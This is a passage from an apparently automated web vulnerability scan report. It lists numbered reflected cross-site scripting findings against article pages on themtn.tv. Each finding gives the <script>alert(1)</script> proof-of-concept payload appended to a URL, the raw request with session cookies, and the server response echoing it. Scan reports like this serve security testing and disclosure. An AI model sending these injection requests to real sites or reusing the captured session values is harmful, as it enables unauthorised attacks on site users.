<strong>"/09/14/10/Quality-Original-Programming/landing.htmle9f87<script>alert(1)</script>956c4f28043"</strong>
...[SNIP]...

2.557. http://www.themtn.tv/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5dea3<script>alert(1)</script>65144c5fd53 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html5dea3<script>alert(1)</script>65144c5fd53 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:26 GMT
Content-Length: 799
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html5dea3<script>alert(1)</script>65144c5fd53"</strong>
...[SNIP]...

2.558. http://www.themtn.tv/09/23/10/An-Impressed-Viewer/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /09/23/10/An-Impressed-Viewer/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 350c4<script>alert(1)</script>db7827277fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /09/23/10/An-Impressed-Viewer/landing.html350c4<script>alert(1)</script>db7827277fe HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:24 GMT
Content-Length: 785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/09/23/10/An-Impressed-Viewer/landing.html350c4<script>alert(1)</script>db7827277fe"</strong>
...[SNIP]...

2.559. http://www.themtn.tv/10/13/10/ALL-22-Is-Alright/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /10/13/10/ALL-22-Is-Alright/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b2e7b<script>alert(1)</script>be6ca4e6195 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10/13/10/ALL-22-Is-Alright/landing.htmlb2e7b<script>alert(1)</script>be6ca4e6195 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:29 GMT
Content-Length: 783
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/10/13/10/ALL-22-Is-Alright/landing.htmlb2e7b<script>alert(1)</script>be6ca4e6195"</strong>
...[SNIP]...

2.560. http://www.themtn.tv/10/27/10/Mountain-West-Football-Saturday-Comments/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /10/27/10/Mountain-West-Football-Saturday-Comments/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e464c<script>alert(1)</script>c1f0e0115f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /10/27/10/Mountain-West-Football-Saturday-Comments/landing.htmle464c<script>alert(1)</script>c1f0e0115f2 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:28 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/10/27/10/Mountain-West-Football-Saturday-Comments/landing.htmle464c<script>alert(1)</script>c1f0e0115f2"</strong>
...[SNIP]...

2.561. http://www.themtn.tv/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29941<script>alert(1)</script>ddc32cdb769 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html29941<script>alert(1)</script>ddc32cdb769 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:30 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html29941<script>alert(1)</script>ddc32cdb769"</strong>
...[SNIP]...

2.562. http://www.themtn.tv/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ba82c<script>alert(1)</script>99261d173b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.htmlba82c<script>alert(1)</script>99261d173b5 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:44 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.htmlba82c<script>alert(1)</script>99261d173b5"</strong>
...[SNIP]...

2.563. http://www.themtn.tv/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5b2e<script>alert(1)</script>a1f78cc2a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.htmlb5b2e<script>alert(1)</script>a1f78cc2a HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:33 GMT
Content-Length: 793
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.htmlb5b2e<script>alert(1)</script>a1f78cc2a"</strong>
...[SNIP]...

2.564. http://www.themtn.tv/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 32f2a<script>alert(1)</script>cbbc0230f4e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html32f2a<script>alert(1)</script>cbbc0230f4e HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:35 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html32f2a<script>alert(1)</script>cbbc0230f4e"</strong>
...[SNIP]...

2.565. http://www.themtn.tv/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6f9e2<script>alert(1)</script>882676cb943 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html6f9e2<script>alert(1)</script>882676cb943 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:33 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html6f9e2<script>alert(1)</script>882676cb943"</strong>
...[SNIP]...

2.566. http://www.themtn.tv/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2ec75<script>alert(1)</script>e2f82d2f95e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html2ec75<script>alert(1)</script>e2f82d2f95e HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:35 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html2ec75<script>alert(1)</script>e2f82d2f95e"</strong>
...[SNIP]...

2.567. http://www.themtn.tv/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3b510<script>alert(1)</script>53c7c3b0dd8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html3b510<script>alert(1)</script>53c7c3b0dd8 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:41 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html3b510<script>alert(1)</script>53c7c3b0dd8"</strong>
...[SNIP]...

2.568. http://www.themtn.tv/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f93df<script>alert(1)</script>c6d3a4637f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.htmlf93df<script>alert(1)</script>c6d3a4637f HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:42 GMT
Content-Length: 805
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.htmlf93df<script>alert(1)</script>c6d3a4637f"</strong>
...[SNIP]...

2.569. http://www.themtn.tv/11/29/10/TCU-Accepts-Big-East-Invite/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /11/29/10/TCU-Accepts-Big-East-Invite/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60386<script>alert(1)</script>d1ff7af33d5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /11/29/10/TCU-Accepts-Big-East-Invite/landing.html60386<script>alert(1)</script>d1ff7af33d5 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:45 GMT
Content-Length: 793
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/11/29/10/TCU-Accepts-Big-East-Invite/landing.html60386<script>alert(1)</script>d1ff7af33d5"</strong>
...[SNIP]...

2.570. http://www.themtn.tv/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4584b<script>alert(1)</script>902a97c3e2e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html4584b<script>alert(1)</script>902a97c3e2e HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:46 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html4584b<script>alert(1)</script>902a97c3e2e"</strong>
...[SNIP]...

2.571. http://www.themtn.tv/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1f1f<script>alert(1)</script>9fe85adca88 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.htmlb1f1f<script>alert(1)</script>9fe85adca88 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:41 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.htmlb1f1f<script>alert(1)</script>9fe85adca88"</strong>
...[SNIP]...

2.572. http://www.themtn.tv/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0d9d<script>alert(1)</script>e71bf1d2bf8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.htmla0d9d<script>alert(1)</script>e71bf1d2bf8 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:44:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:44:45 GMT
Content-Length: 806
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.htmla0d9d<script>alert(1)</script>e71bf1d2bf8"</strong>
...[SNIP]...

2.573. http://www.themtn.tv/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad6b3<script>alert(1)</script>9828d68270 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.htmlad6b3<script>alert(1)</script>9828d68270 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
